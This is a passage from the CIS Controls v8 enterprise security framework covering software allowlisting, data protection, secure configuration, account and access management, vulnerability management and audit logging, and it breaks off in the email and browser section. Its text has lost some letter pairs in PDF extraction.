designate as unauthorized. Review the so ware list to verify so ware support at least monthly, or more frequently.
2.3 Address Unauthorized So ware Applica ons -Respond- •••

Ensure that unauthorized so ware is either removed from use on enterprise assets or receives a documented excep on.
Review monthly, or more frequently.
2.4 U lize Automated So ware Inventory Tools Applica ons -Detect- ••

U lize so ware inventory tools, when possible, throughout the enterprise to automate the discovery and documenta on of
installed so ware.
2.5 Allowlist Authorized So ware Applica ons -Protect- ••

Use technical controls, such as applica on allowlis ng, to ensure that only authorized so ware can execute or be accessed.
Reassess bi-annually, or more frequently.
2.6 Allowlist Authorized Libraries Applica ons -Protect- ••

Use technical controls to ensure that only authorized so ware libraries, such as specific .dll, .ocx, .so, etc., files are allowed to
load into a system process. Block unauthorized libraries from loading into a system process. Reassess bi-annually, or more
frequently.
2.7 Allowlist Authorized Scripts Applica ons -Protect- •

Use technical controls, such as digital signatures and version control, to ensure that only authorized scripts, such as specific
.ps1, .py, etc., files are allowed to execute. Block unauthorized scripts from execu ng. Reassess bi-annually, or more
frequently.
Data Protec on
Overview Develop processes and technical controls to iden fy, classify, securely
handle, retain, and dispose of data.

Data is no longer only contained within an enterprise’s border; it is in the cloud, on portable
end-user devices where users work from home, and is o en shared with partners or online
services that might have it anywhere in the world. In addi on to sensi ve data an enterprise
holds related to finances, intellectual property, and customer data, there also might be
numerous interna onal regula ons for protec on of personal data. Data privacy has become
increasingly important, and enterprises are learning that privacy is about the appropriate use
and management of data, not just encryp on. Data must be appropriately managed through
its en re life cycle. These privacy rules can be complicated for mul -na onal enterprises of
any size; however, there are fundamentals that can apply to all.
Once a ackers have penetrated an enterprise’s infrastructure, one of their first tasks is to find
and exfiltrate data. Enterprises might not be aware that sensi ve data is leaving their
environment because they are not monitoring data ou lows.
While many a acks occur on the network, others involve physical the of portable end-user
devices, a acks on service providers or other partners holding sensi ve data. Other sensi ve
enterprise assets may also include non-compu ng devices that provide management and
control of physical systems, such as Supervisory Control and Data Acquisi on (SCADA)
systems.
The enterprise’s loss of control over protected or sensi ve data is a serious and o en
reportable business impact. While some data is compromised or lost as a result of the or
espionage, the vast majority are a result of poorly understood data management rules, and
user error. The adop on of data encryp on, both in transit and at rest, can provide mi ga on
against data compromise, and, even more important, it is a regulatory requirement for most
controlled data.
CIS Controls v8 Control 03: Data Protec on Page 15

It is important for an enterprise to develop a data management process that includes a data
management framework, data classifica on guidelines, and requirements for protec on,
handling, reten on, and disposal of data. There should also be a data breach process that
plugs into the incident response plan, and the compliance and communica on plans. To
derive data sensi vity levels, enterprises need to catalog their key types of data and the
overall cri cality (impact to its loss or corrup on) to the enterprise. This analysis would be
used to create an overall data classifica on scheme for the enterprise. Enterprises may use
labels, such as “Sensi ve,” “Confiden al,” and “Public,” and classify their data according to
those labels.
Once the sensi vity of the data has been defined, a data inventory or mapping should be
developed that iden fies so ware accessing data at various sensi vity levels and the
enterprise assets that house those applica ons. Ideally, the network would be separated so
that enterprise assets of the same sensi vity level are on the same network and separated
from enterprise assets with different sensi vity levels. If possible, firewalls need to control
access to each segment, and have user access rules applied to only allow those with a
business need to access the data.
For more comprehensive treatment of this topic, we suggest the following resources to help
the enterprise with data protec on:
→ NIST® SP 800-88r1 Guides for Media Sani za on – h ps://nvlpubs.nist.gov/

nistpubs/SpecialPublica ons/NIST.SP.800-88r1.pdf
→ NIST® FIPS 140-2 – h ps://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-2.pdf → NIST® FIPS
140-3 – h ps://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-3.pdf
→ For cloud-specific guidance, refer to the CIS Controls Cloud Companion Guide –
Safeguards
3.1 Establish and Maintain a Data Management Process Data -Iden fy- •••
Establish and maintain a data management process. In the process, address data sensi vity, data owner, handling of data,
data reten on limits, and disposal requirements, based on sensi vity and reten on standards for the enterprise. Review and
update documenta on annually, or when significant enterprise changes occur that could impact this Safeguard.
3.2 Establish and Maintain a Data Inventory Data -Iden fy- •••
Establish and maintain a data inventory, based on the enterprise’s data management process. Inventory sensi ve data, at a
minimum. Review and update inventory annually, at a minimum, with a priority on sensi ve data.

3.3 Configure Data Access Control Lists Data -Protect- •••
Configure data access control lists based on a user’s need to know. Apply data access control lists, also known as access
permissions, to local and remote file systems, databases, and applica ons.
3.4 Enforce Data Reten on Data -Protect- •••

Retain data according to the enterprise’s data management process. Data reten on must include both minimum and
maximum melines.
3.5 Securely Dispose of Data Data -Protect- •••

Securely dispose of data as outlined in the enterprise’s data management process. Ensure the disposal process and method
are commensurate with the data sensi vity.
3.6 Encrypt Data on End-User Devices Devices -Protect- •••

Encrypt data on end-user devices containing sensi ve data. Example implementa ons can include: Windows BitLocker®,
Apple FileVault®, Linux® dm-crypt.
3.7 Establish and Maintain a Data Classifica on Scheme Data -Iden fy- ••
Establish and maintain an overall data classifica on scheme for the enterprise. Enterprises may use labels, such as
“Sensi ve,” “Confiden al,” and “Public,” and classify their data according to those labels. Review and update the
classifica on scheme annually, or when significant enterprise changes occur that could impact this Safeguard.
Document Data Flows

Document data flows. Data flow documenta on includes service provider data flows and should be based on the enterprise’s
data management process. Review and update documenta on annually, or when significant enterprise changes occur that
could impact this Safeguard.
3.9 Encrypt Data on Removable Media Data -Protect- ••

Encrypt data on removable media.
3.10 Encrypt Sensi ve Data in Transit Data -Protect- ••

Encrypt sensi ve data in transit. Example implementa ons can include: Transport Layer Security (TLS) and Open Secure Shell
(OpenSSH).
3.11 Encrypt Sensi ve Data at Rest Data -Protect- ••

Encrypt sensi ve data at rest on servers, applica ons, and databases containing sensi ve data. Storage-layer encryp on, also
known as server-side encryp on, meets the minimum requirement of this Safeguard. Addi onal encryp on methods may
include applica on-layer encryp on, also known as client-side encryp on, where access to the data storage device(s) does
not permit access to the plain-text data.
3.12 Segment Data Processing and Storage Based on Sensi vity Network -Protect- ••
Segment data processing and storage based on the sensi vity of the data. Do not process sensi ve data on enterprise assets
intended for lower sensi vity data.

3.13 Deploy a Data Loss Preven on Solu on Data -Protect- •
Implement an automated tool, such as a host-based Data Loss Preven on (DLP) tool to iden fy all sensi ve data stored,
processed, or transmi ed through enterprise assets, including those located onsite or at a remote service provider, and
update the enterprise’s sensi ve data inventory.

Secure Configura on of
Enterprise Assets and So ware

Overview Establish and maintain the secure configura on of enterprise assets

(end-user devices, including portable and mobile; network devices;
non-compu ng/IoT devices; and servers) and so ware (opera ng
systems and applica ons).

As delivered from manufacturers and resellers, the default configura ons for enterprise assets
and so ware are normally geared towards ease-of-deployment and ease-ofuse rather than
security. Basic controls, open services and ports, default accounts or passwords, pre-
configured Domain Name System (DNS) se ngs, older (vulnerable) protocols, and pre-
installa on of unnecessary so ware can all be exploitable if le in their default state. Further,
these security configura on updates need to be managed and maintained over the life cycle of
enterprise assets and so ware. Configura on updates need to be tracked and approved
through configura on management workflow process to maintain a record that can be
reviewed for compliance, leveraged for incident response, and to support audits. This CIS
Control is important to on-premises devices, as well as remote devices, network devices, and
cloud environments.
Service providers play a key role in modern infrastructures, especially for smaller enterprises.
They o en are not set up by default in the most secure configura on to provide flexibility for
their customers to apply their own security policies. Therefore, the presence of default
accounts or passwords, excessive access, or unnecessary services are common in default
configura ons. These could introduce weaknesses that are under the responsibility of the
enterprise that is using the so ware, rather than the service provider. This extends to ongoing
management and updates, as some Pla orm as a Service (PaaS) only extend to the opera ng
system, so patching and upda ng hosted applica ons are under the responsibility of the
enterprise.
CIS Controls v8 Control 04: Secure Configura on of Enterprise Assets and So ware Page 19
Even a er a strong ini al configura on is developed and applied, it must be con nually
managed to avoid degrading security as so ware is updated or patched, new security
vulnerabili es are reported, and configura ons are “tweaked,” to allow the installa on of new
so ware or to support new opera onal requirements.

There are many available security baselines for each system. Enterprises should start with
these publicly developed, ve ed, and supported security benchmarks, security guides, or
checklists. Some resources include:
→ The CIS Benchmarks™ Program – h p://www.cisecurity.org/cis-benchmarks/
→ The Na onal Ins tute of Standards and Technology (NIST®) Na onal Checklist Program Repository –
h ps://nvd.nist.gov/ncp/repository
Enterprises should augment or adjust these baselines to sa sfy enterprise security policies,
and industry and government regulatory requirements. Devia ons of standard configura ons
and ra onale should be documented to facilitate future reviews or audits.
For a larger or more complex enterprise, there will be mul ple security baseline configura ons
based on security requirements or classifica on of the data on the enterprise asset. Here is an
example of the steps to build a secure baseline image:
01 Determine the risk classifica on of the data handled/stored on the enterprise asset (e.g.,
high, moderate, low risk).
02 Create a security configura on script that sets system security se ngs to meet the
requirements to protect the data used on the enterprise asset. Use benchmarks, such as
the ones described earlier in this sec on.
03 Install the base opera ng system so ware.
04 Apply appropriate opera ng system and security patches.
05 Install appropriate applica on so ware packages, tool, and u li es.
06 Apply appropriate updates to so ware installed in Step 4.
07 Install local customiza on scripts to this image.
08 Run the security script created in Step 2 to set the appropriate security level.
09 Run a SCAP compliant tool to record/score the system se ng of the baseline image.
10 Perform a security quality assurance test.
11 Save this base image in a secure loca on.
Commercial and/or free configura on management tools, such as the CIS Configura on
Assessment Tool (CIS-CAT®) h ps://learn.cisecurity.org/cis-cat-lite, can be deployed to
measure the se ngs of opera ng systems and applica ons of managed machines to look for
devia ons from the standard image configura ons. Commercial configura on management
tools use some combina on of an agent installed on each managed system, or agentless
inspec on of systems through remotely logging into each enterprise asset using administrator
creden als. Addi onally, a hybrid approach is some mes used whereby a remote session is
ini ated, a temporary or dynamic agent is deployed on the target system for the scan, and
then the agent is removed.
Safeguards
4.1 Establish and Maintain a Secure Configura on Process Applica ons -Protect- •••
Establish and maintain a secure configura on process for enterprise assets (end-user devices, including portable and mobile;
non-compu ng/IoT devices; and servers) and so ware (opera ng systems and applica ons). Review and update
documenta on annually, or when significant enterprise changes occur that could impact this Safeguard.
4.2 Establish and Maintain a Secure Configura on Process for Network -Protect- •••
Network Infrastructure
Establish and maintain a secure configura on process for network devices. Review and update documenta on annually, or
when significant enterprise changes occur that could impact this Safeguard.
4.3 Configure Automa c Session Locking on Enterprise Assets Users -Protect- •••
Configure automa c session locking on enterprise assets a er a defined period of inac vity. For general purpose opera ng
systems, the period must not exceed 15 minutes. For mobile end-user devices, the period must not exceed 2 minutes.
4.4 Implement and Manage a Firewall on Servers Devices -Protect- •••

Implement and manage a firewall on servers, where supported. Example implementa ons include a virtual firewall, opera ng
system firewall, or a third-party firewall agent.
4.5 Implement and Manage a Firewall on End-User Devices Devices -Protect- •••
Implement and manage a host-based firewall or port-filtering tool on end-user devices, with a default-deny rule that drops all
traffic except those services and ports that are explicitly allowed.
4.6 Securely Manage Enterprise Assets and So ware Network -Protect- •••
Securely manage enterprise assets and so ware. Example implementa ons include managing configura on through version-
controlled-infrastructure-as-code and accessing administra ve interfaces over secure network protocols, such as Secure Shell
(SSH) and Hypertext Transfer Protocol Secure (HTTPS). Do not use insecure management protocols, such as Telnet (Teletype
Network) and HTTP, unless opera onally essen al.
4.7 Manage Default Accounts on Enterprise Assets and So ware Users -Protect- •••
Manage default accounts on enterprise assets and so ware, such as root, administrator, and other pre-configured vendor
accounts. Example implementa ons can include: disabling default accounts or making them unusable.
4.8 Uninstall or Disable Unnecessary Services on Enterprise Devices -Protect- ••

Assets and So ware
Uninstall or disable unnecessary services on enterprise assets and so ware, such as an unused file sharing service, web
applica on module, or service func on.
4.9 Configure Trusted DNS Servers on Enterprise Assets Devices -Protect- ••

Configure trusted DNS servers on enterprise assets. Example implementa ons include: configuring assets to use enterprise-
controlled DNS servers and/or reputable externally accessible DNS servers.
4.10 Enforce Automa c Device Lockout on Portable Devices -Respond- ••
End-User Devices
Enforce automa c device lockout following a predetermined threshold of local failed authen ca on a empts on portable
end-user devices, where supported. For laptops, do not allow more than 20 failed authen ca on a empts; for tablets and
smartphones, no more than 10 failed authen ca on a empts. Example implementa ons include Microso ® InTune Device
Lock and Apple® Configura on Profile maxFailedA empts.
4.11 Enforce Remote Wipe Capability on Portable Devices -Protect- ••

End-User Devices
Remotely wipe enterprise data from enterprise-owned portable end-user devices when deemed appropriate such as lost or
stolen devices, or when an individual no longer supports the enterprise.
4.12 Separate Enterprise Workspaces on Mobile Devices -Protect- •

End-User Devices
Ensure separate enterprise workspaces are used on mobile end-user devices, where supported. Example implementa ons
include using an Apple® Configura on Profile or Android™ Work Profile to separate enterprise applica ons and data from
personal applica ons and data.
ManagementAccount
Overview Use processes and tools to assign and manage authoriza on to

creden als for user accounts, including administrator accounts, as well
as service accounts, to enterprise assets and so ware.

It is easier for an external or internal threat actor to gain unauthorized access to enterprise
assets or data through using valid user creden als than through “hacking” the environment.
There are many ways to covertly obtain access to user accounts, including: weak passwords,
accounts s ll valid a er a user leaves the enterprise, dormant or lingering test accounts,
shared accounts that have not been changed in months or years, service accounts embedded
in applica ons for scripts, a user having the same password as one they use for an online
account that has been compromised (in a public password dump), social engineering a user to
give their password, or using malware to capture passwords or tokens in memory or over the
network.
Administra ve, or highly privileged, accounts are a par cular target, because they allow
a ackers to add other accounts, or make changes to assets that could make them more
vulnerable to other a acks. Service accounts are also sensi ve, as they are o en shared
among teams, internal and external to the enterprise, and some mes not known about, only
to be revealed in standard account management audits.
Finally, account logging and monitoring is a cri cal component of security opera ons.
While account logging and monitoring are covered in CIS Control 8 (Audit Log Management), it
is important in the development of a comprehensive Iden ty and Access Management (IAM)
program.

Creden als are assets that must be inventoried and tracked like enterprise assets and
so ware, as they are the primary entry point into the enterprise. Appropriate password
policies and guidance not to reuse passwords should be developed.
CIS Controls v8 Control 05: Account Management Page 23

→ For guidance on the crea on and use of passwords, reference the CIS Password Policy Guide
– h ps://www.cisecurity.org/white-papers/cis-passwordpolicy-guide/
Accounts must also be tracked; any account that is dormant must be disabled and eventually
removed from the system. There should be periodic audits to ensure all ac ve accounts are
traced back to authorized users of the enterprise asset. Look for new accounts added since
previous review, especially administrator and service accounts. Close a en on should be
made to iden fy and track administra ve, or highprivileged accounts and service accounts.
Users with administrator or other privileged access should have separate accounts for those
higher authority tasks. These accounts would only be used when performing those tasks or
accessing especially sensi ve data, to reduce risk in case their normal user account is
compromised. For users with mul ple accounts, their base user account, used day-to-day for
non-administra ve tasks, should not have any elevated privileges.
Single Sign-On (SSO) is convenient and secure when an enterprise has many applica ons,
including cloud applica ons, which helps reduce the number of passwords a user must
manage. Users are recommended to use password manager applica ons to securely store
their passwords, and should be instructed not to keep them in spreadsheets or text files on
their computers. MFA is recommended for remote access.
Users must also be automa cally logged out of the system a er a period of inac vity, and be
trained to lock their screen when they leave their device to minimize the possibility of
someone else in physical proximity around the user accessing their system, applica ons, or
data.
→ An excellent resource is the NIST® Digital Iden ty Guidelines – h ps://pages.nist. gov/800-63-3/
Safeguards
Establish and maintain an inventory of all accounts managed in the enterprise. The inventory must include both user and
administrator accounts. The inventory, at a minimum, should contain the person’s name, username, start/ stop dates, and
department. Validate that all ac ve accounts are authorized, on a recurring schedule at a minimum quarterly, or more
frequently.
5.2 Use Unique Passwords Users -Protect- •••

Use unique passwords for all enterprise assets. Best prac ce implementa on includes, at a minimum, an 8-character
password for accounts using MFA and a 14-character password for accounts not using MFA.
5.3 Disable Dormant Accounts Users -Respond- •••

Delete or disable any dormant accounts a er a period of 45 days of inac vity, where supported.

5.4 Restrict Administrator Privileges to Dedicated Users -Protect- •••
Administrator Accounts
Restrict administrator privileges to dedicated administrator accounts on enterprise assets. Conduct general compu ng
ac vi es, such as internet browsing, email, and produc vity suite use, from the user’s primary, nonprivileged account.
5.5 Establish and Maintain an Inventory of Service Accounts Users -Iden fy- ••
Establish and maintain an inventory of service accounts. The inventory, at a minimum, must contain department owner,
review date, and purpose. Perform service account reviews to validate that all ac ve accounts are authorized, on a recurring
schedule at a minimum quarterly, or more frequently.
5.6 Centralize Account Management Users -Protect- ••

Centralize account management through a directory or iden ty service.

Access Control Management
Overview Use processes and tools to create, assign, manage, and revoke access
creden als and privileges for user, administrator, and service accounts
for enterprise assets and so ware.

Where CIS Control 5 deals specifically with account management, CIS Control 6 focuses on
managing what access these accounts have, ensuring users only have access to the data or
enterprise assets appropriate for their role, and ensuring that there is strong authen ca on
for cri cal or sensi ve enterprise data or func ons. Accounts should only have the minimal
authoriza on needed for the role. Developing consistent access rights for each role and
assigning roles to users is a best prac ce. Developing a program for complete provision and
de-provisioning access is also important. Centralizing this func on is ideal.
There are some user ac vi es that pose greater risk to an enterprise, either because they are
accessed from untrusted networks, or performing administrator func ons that allow the
ability to add, change, or remove other accounts, or make configura on changes to opera ng
systems or applica ons to make them less secure. This also enforces the importance of using
MFA and Privileged Access Management (PAM) tools.
Some users have access to enterprise assets or data they do not need for their role; this might
be due to an immature process that gives all users all access, or lingering access as users
change roles within the enterprise over me. Local administrator privileges to users’ laptops is
also an issue, as any malicious code installed or downloaded by the user can have greater
impact on the enterprise asset running as administrator. User, administrator, and service
account access should be based on enterprise role and need.

There should be a process where privileges are granted and revoked for user accounts. This
ideally is based on enterprise role and need through role-based access. Rolebased access is a
technique to define and manage access requirements for each account based on: need to
know, least privilege, privacy requirements, and/or separa on of du es. There are technology
CIS Controls v8 Control 06: Access Control Management Page 26

tools to help manage this process. However, there might be more granular or temporary
access based on circumstance.
MFA should be universal for all privileged or administrator accounts. There are many tools
that have smartphone applica ons to perform this func on, and are easy to deploy. Using
the number-generator feature is more secure than just sending a Short Messaging Service
(SMS) message with a one- me code, or promp ng a “push” alert for a user to accept.
However, neither is recommended for privileged account MFA. PAM tools are available for
privileged account control, and provide a one- me password that must be checked out for
each use. For addi onal security in system administra on, using “jump-boxes” or out of
band terminal connec ons is recommended.
Comprehensive account de-provisioning is important. Many enterprises have repeatable

consistent processes for removing access when employees leave the enterprise. However, that
process is not always consistent for contractors, and must be included in the standard de-
provisioning process. Enterprises should also inventory and track service accounts, as a
common error is leaving clear text tokens or passwords in code, and pos ng to public cloud-
based code repositories.
High-privileged accounts should not be used for day-to-day use, such as web surfing and email
reading. Administrators should have separate accounts that do not have elevated privileges for
daily office use, and should log into administrator accounts only when performing
administrator func ons requiring that level of authoriza on. Security personnel should
periodically gather a list of running processes to determine whether any browsers or email
readers are running with high privileges.
→ An excellent resource is the NIST® Digital Iden ty Guidelines – h ps://pages.nist. gov/800-63-3/
Safeguards
6.1 Establish an Access Gran ng Process Users -Protect- •••

Establish and follow a process, preferably automated, for gran ng access to enterprise assets upon new hire, rights grant, or
role change of a user.
6.2 Establish an Access Revoking Process Users -Protect- •••

Establish and follow a process, preferably automated, for revoking access to enterprise assets, through disabling accounts
immediately upon termina on, rights revoca on, or role change of a user. Disabling accounts, instead of dele ng accounts,
may be necessary to preserve audit trails.
6.3 Require MFA for Externally-Exposed Applica ons Users -Protect- •••
Require all externally-exposed enterprise or third-party applica ons to enforce MFA, where supported. Enforcing MFA
through a directory service or SSO provider is a sa sfactory implementa on of this Safeguard.

6.4 Require MFA for Remote Network Access Users -Protect- •••
Require MFA for remote network access.
6.5 Require MFA for Administra ve Access Users -Protect- •••

Require MFA for all administra ve access accounts, where supported, on all enterprise assets, whether managed on-site or
through a third-party provider.
6.6 Establish and Maintain an Inventory of Authen ca on and Users -Iden fy- ••
Authoriza on Systems
Establish and maintain an inventory of the enterprise’s authen ca on and authoriza on systems, including those hosted
on-site or at a remote service provider. Review and update the inventory, at a minimum, annually, or more frequently.
6.7 Centralize Access Control Users -Protect- ••

Centralize access control for all enterprise assets through a directory service or SSO provider, where supported.
6.8 Define and Maintain Role-Based Access Control Data -Protect- •

Define and maintain role-based access control, through determining and documen ng the access rights necessary for each
role within the enterprise to successfully carry out its assigned du es. Perform access control reviews of enterprise assets to
validate that all privileges are authorized, on a recurring schedule at a minimum annually, or more frequently.

Con nuous Vulnerability
Management
Overview Develop a plan to con nuously assess and track vulnerabili es

on all enterprise assets within the enterprise’s infrastructure, in order
to remediate, and minimize, the window of opportunity for a ackers.
Monitor public and private industry sources for new threat and
vulnerability informa on.

Cyber defenders are constantly being challenged from a ackers who are looking for
vulnerabili es within their infrastructure to exploit and gain access. Defenders must have
mely threat informa on available to them about: so ware updates, patches, security
advisories, threat bulle ns, etc., and they should regularly review their environment to
iden fy these vulnerabili es before the a ackers do. Understanding and managing
vulnerabili es is a con nuous ac vity, requiring focus of me, a en on, and resources.
A ackers have access to the same informa on and can o en take advantage of
vulnerabili es more quickly than an enterprise can remediate. While there is a gap in me
from a vulnerability being known to when it is patched, defenders can priori ze which
vulnerabili es are most impac ul to the enterprise, or likely to be exploited first due to ease
of use. For example, when researchers or the community report new vulnerabili es, vendors
have to develop and deploy patches, indicators of compromise (IOCs), and updates.
Defenders need to assess the risk of the new vulnerability to the enterprise, regression-test
patches, and install the patch.
There is never perfec on in this process. A ackers might be using an exploit to a

vulnerability that is not known within the security community. They might have developed
an exploit to this vulnerability referred to as a “zero-day” exploit. Once the vulnerability is
known in the community, the process men oned above starts. Therefore, defenders must
keep in mind that an exploit might already exist when the vulnerability is widely socialized.
Some mes vulnerabili es might be known within a closed community (e.g., vendor s ll
CIS Controls v8 Control 07: Con nuous Vulnerability Management Page 29

developing a fix) for weeks, months, or years before it is disclosed publicly. Defenders have
to be aware that there might always be vulnerabili es they cannot remediate, and
therefore need to use other controls to mi gate.
Enterprises that do not assess their infrastructure for vulnerabili es and proac vely address
discovered flaws face a significant likelihood of having their enterprise assets compromised.
Defenders face par cular challenges in scaling remedia on across an en re enterprise, and
priori zing ac ons with conflic ng priori es, while not impac ng the enterprise’s business or
mission.

A large number of vulnerability scanning tools are available to evaluate the security
configura on of enterprise assets. Some enterprises have also found commercial services
using remotely managed scanning appliances to be effec ve. To help standardize the
defini ons of discovered vulnerabili es across an enterprise, it is preferable to use
vulnerability scanning tools that map vulnerabili es to one or more of the following industry-
recognized vulnerability, configura on and pla orm classifica on schemes and languages:
Common Vulnerabili es and Exposures (CVE®), Common Configura on Enumera on (CCE),
Open Vulnerability and Assessment Language
(OVAL®), Common Pla orm Enumera on (CPE), Common Vulnerability Scoring System (CVSS),
and/or Extensible Configura on Checklist Descrip on Format (XCCDF). These schemes and
languages are components of SCAP.
→ More informa on on SCAP can be found here – h ps://nvlpubs.nist.gov/nistpubs/

SpecialPublica ons/NIST.SP.800-126r3.pdf
The frequency of scanning ac vi es should increase as the diversity of an enterprise’s assets

increases to account for the varying patch cycles of each vendor. Advanced vulnerability
scanning tools can be configured with user creden als to authen cate into enterprise assets
and perform more comprehensive assessments. These are called
“authen cated scans.”
In addi on to the scanning tools that check for vulnerabili es and misconfigura ons across the
network, various free and commercial tools can evaluate security se ngs and configura ons
of enterprise assets. Such tools can provide fine-grained insight into unauthorized changes in
configura on or the inadvertent introduc on of security weaknesses from administrators.
Effec ve enterprises link their vulnerability scanners with problem- cke ng systems that track
and report progress on fixing vulnerabili es. This can help highlight unmi gated cri cal
vulnerabili es to senior management to ensure they are resolved. Enterprises can also track
how long it took to remediate a vulnerability, a er iden fied, or a patch has been issued.
These can support internal or industry compliance requirements. Some mature enterprises
will go over these reports in IT security steering commi ee mee ngs, which bring leaders
from IT and the business together to priori ze remedia on efforts based on business impact.
In selec ng which vulnerabili es to fix, or patches to apply, an enterprise should augment

NIST’s Common Vulnerability Scoring System (CVSS) with data concerning the likelihood of a
threat actor using a vulnerability, or poten al impact of an exploit to the enterprise.
Informa on on the likelihood of exploita on should also be periodically updated based on

the most current threat informa on. For example, the release of a new exploit, or new
intelligence rela ng to exploita on of the vulnerability, should change the priority through
which the vulnerability should be considered for patching. Various commercial systems are
available to allow an enterprise to automate and maintain this process in a scalable manner.
The most effec ve vulnerability scanning tools compare the results of the current scan with
previous scans to determine how the vulnerabili es in the environment have changed over
me. Security personnel use these features to conduct vulnerability trending from month to
month.
Finally, there should be a quality assurance process to verify configura on updates, or that
patches are implemented correctly and across all relevant enterprise assets.
Safeguards
7.1 Establish and Maintain a Vulnerability Management Process Applica ons -Protect- •••
Establish and maintain a documented vulnerability management process for enterprise assets. Review and update
7.2 Establish and Maintain a Remedia on Process Applica ons -Respond- •••
Establish and maintain a risk-based remedia on strategy documented in a remedia on process, with monthly, or more
frequent, reviews.
7.3 Perform Automated Opera ng System Patch Management Applica ons -Protect- •••
Perform opera ng system updates on enterprise assets through automated patch management on a monthly, or more
frequent, basis.
7.4 Perform Automated Applica on Patch Management Applica ons -Protect- •••
Perform applica on updates on enterprise assets through automated patch management on a monthly, or more frequent,
basis.
7.5 Perform Automated Vulnerability Scans of Internal Applica ons -Iden fy- ••
Enterprise Assets
Perform automated vulnerability scans of internal enterprise assets on a quarterly, or more frequent, basis. Conduct both
authen cated and unauthen cated scans, using a SCAP-compliant vulnerability scanning tool.
7.6 Perform Automated Vulnerability Scans of Externally- Applica ons -Iden fy- ••
Exposed Enterprise Assets
Perform automated vulnerability scans of externally-exposed enterprise assets using a SCAP-compliant vulnerability scanning
tool. Perform scans on a monthly, or more frequent, basis.
7.7 Remediate Detected Vulnerabili es Applica ons -Respond- ••

Remediate detected vulnerabili es in so ware through processes and tooling on a monthly, or more frequent, basis, based
on the remedia on process.

Audit Log Management
Overview Collect, alert, review, and retain audit logs of events that could help
detect, understand, or recover from an a ack.

Log collec on and analysis is cri cal for an enterprise’s ability to detect malicious ac vity
quickly. Some mes audit records are the only evidence of a successful a ack. A ackers know
that many enterprises keep audit logs for compliance purposes, but rarely analyze them.
A ackers use this knowledge to hide their loca on, malicious so ware, and ac vi es on vic m
machines. Due to poor or nonexistent log analysis processes, a ackers some mes control
vic m machines for months or years without anyone in the target enterprise knowing.
There are two types of logs that are generally treated and o en configured independently:
system logs and audit logs. System logs typically provide system-level events that show various
system process start/end mes, crashes, etc. These are na ve to systems, and take less
configura on to turn on. Audit logs typically include user-level events—when a user logged in,
accessed a file, etc.—and take more planning and effort to set up.
Logging records are also cri cal for incident response. A er an a ack has been detected, log
analysis can help enterprises understand the extent of an a ack. Complete logging records can
show, for example, when and how the a ack occurred, what informa on was accessed, and if
data was exfiltrated. Reten on of logs is also cri cal in case a follow-up inves ga on is
required or if an a ack remained undetected for a long period of me.

Most enterprise assets and so ware offer logging capabili es. Such logging should be
ac vated, with logs sent to centralized logging servers. Firewalls, proxies, and remote access
systems (Virtual Private Network (VPN), dial-up, etc.) should all be configured for verbose
logging where beneficial. Reten on of logging data is also important in the event an incident
inves ga on is required.

Control 08: Audit Log Management
Furthermore, all enterprise assets should be configured to create access control logs when a
user a empts to access resources without the appropriate privileges. To evaluate whether
such logging is in place, an enterprise should periodically scan through its logs and compare
them with the enterprise asset inventory assembled as part of CIS Control 1, in order to
ensure that each managed asset ac vely connected to the network is periodically genera ng
logs.
Safeguards
NUMBERTITLE/ DESCRIPTION ASSET TYPE SECURITY FUNCTION IG1 IG2 IG3
8.1 Establish and Maintain an Audit Log Management Process Network -Protect- •••
Establish and maintain an audit log management process that defines the enterprise’s logging requirements. At a
minimum, address the collec on, review, and reten on of audit logs for enterprise assets. Review and update
8.2 Collect Audit Logs Network -Detect- •••

Collect audit logs. Ensure that logging, per the enterprise’s audit log management process, has been enabled across
enterprise assets.
8.3 Ensure Adequate Audit Log Storage Network -Protect- •••

Ensure that logging des na ons maintain adequate storage to comply with the enterprise’s audit log management process.
8.4 Standardize Time Synchroniza on Network -Protect- ••

Standardize me synchroniza on. Configure at least two synchronized me sources across enterprise assets, where
supported.

8.5 Collect Detailed Audit Logs Network -Detect- ••
Configure detailed audit logging for enterprise assets containing sensi ve data. Include event source, date, username,
mestamp, source addresses, des na on addresses, and other useful elements that could assist in a forensic inves ga on.
8.6 Collect DNS Query Audit Logs Network -Detect- ••

Collect DNS query audit logs on enterprise assets, where appropriate and supported.
8.7 Collect URL Request Audit Logs Network -Detect- ••

Collect URL request audit logs on enterprise assets, where appropriate and supported.
8.8 Collect Command-Line Audit Logs Devices -Detect- ••

Collect command-line audit logs. Example implementa ons include collec ng audit logs from PowerShell®, BASH™, and
remote administra ve terminals.
8.9 Centralize Audit Logs Network -Detect- ••

Centralize, to the extent possible, audit log collec on and reten on across enterprise assets.
8.10 Retain Audit Logs Network -Protect- ••

Retain audit logs across enterprise assets for a minimum of 90 days.
8.11 Conduct Audit Log Reviews Network -Detect- ••

Conduct reviews of audit logs to detect anomalies or abnormal events that could indicate a poten al threat. Conduct reviews
on a weekly, or more frequent, basis.
8.12 Collect Service Provider Logs Data -Detect- •

Collect service provider logs, where supported. Example implementa ons include collec ng authen ca on and authoriza on
events, data crea on and disposal events, and user management events.
Control 08: Audit Log Management
Email and Web Browser
Protec ons
CIS Controls v8 Control 09: Email and Web Browser Protec ons Page 34
Overview Improve protec ons and detec ons of threats from email and
web vectors, as these are opportuni es for a ackers to
manipulate human behavior through direct engagement.

Web browsers and email clients are very common points of entry for a ackers because of
their direct interac on with users inside an enterprise. Content can be cra ed to en ce or
spoof users into disclosing creden als, providing sensi ve data, or providing an open channel
to allow a ackers to gain access, thus increasing risk to the enterprise. Since email and web
are the main means that users interact with external and untrusted users and environments,
these are prime targets for both malicious code and social engineering. Addi onally, as
enterprises move to web-based email, or mobile email access, users no longer use tradi onal
full-featured email clients, which provide embedded security controls like connec on
encryp on, strong authen ca on, and phishing repor ng bu ons.

Web Browser
Cybercriminals can exploit web browsers in mul ple ways. If they have access to exploits of
vulnerable browsers, they can cra malicious webpages that can exploit those
vulnerabili es when browsed with an insecure, or unpatched, browser. Alterna vely, they
can try to target any number of common web browser thirdparty plugins that may allow
them to hook into the browser or even directly into the opera ng system or applica on.
These plugins, much like any other so ware within an environment, need to be reviewed
for vulnerabili es, kept up-to-date with latest patches or versions, and controlled. Many
come from untrusted sources, and some are even wri en to be malicious. Therefore, it is
best to prevent users from inten onally or uninten onally installing malware that might be
hiding in some of these plugins, extensions, and add-ons. Simple configura on updates to
the browser can make it much harder for malware to get installed through reducing the
ability of installing add-ons/plugins/extensions and preven ng specific types of content
from automa cally execu ng.

Most popular browsers employ a database of phishing and/or malware sites to protect against
